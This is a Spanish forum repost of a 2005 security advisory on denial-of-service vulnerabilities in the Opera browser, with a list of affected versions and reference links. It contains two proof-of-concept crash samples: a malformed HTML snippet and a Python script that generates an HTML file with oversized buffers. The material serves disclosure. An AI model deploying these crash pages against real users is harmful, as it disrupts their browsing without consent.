« anterior próximo »
Páginas: [1]   Ir Abajo

Autor Tema: Denegación de servicio en Opera Web Browser  (Leído 1525 veces)

Desconectado Liamngls

  • Iniciado
  • *****
  • Mensajes: 15689
    • Manuales-e
Denegación de servicio en Opera Web Browser
« en: 23 de Octubre de 2005, 05:46:02 am »
Denegación de servicio en Opera Web Browser


Por Angela Ruiz
[email protected]

Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa.

El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

No se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este navegador.

El primer ejemplo es un código HTML mal formado:

    <html><head></head><body><bdo>A<bgsound style=
    "margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso, contenido HTML:

    html = open("opera.html", "w")
    html.write("<html style=\"content: url(0);\">\n")
    html.write("<head></head>\n")
    buff1 = 'A'*32499
    html.write("<bodyA>\n"+buff1+"\n")
    buff2 = 'B'*153
    html.write("<u "+buff2+">\n")
    html.write("</body></html>")
    html.close()


Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0
- Opera Web Browser 7.54
- Opera Web Browser 7.53
- Opera Web Browser 7.52
- Opera Web Browser 7.51
- Opera Web Browser 7.50
- Opera Web Browser 7.23
- Opera Web Browser 7.22
- Opera Web Browser 7.21
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11
- Opera Web Browser 7.10
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3


Soluciones:

No existe al momento actual, ninguna solución oficial para este problema.


Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info

Fuente: http://www.vsantivirus.com/vul-opera-171005.htm
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Aviso Legal | Política de Privacidad | Política de Cookies

el contenido de la web se rige bajo licencia
Creative Commons License
creative commons.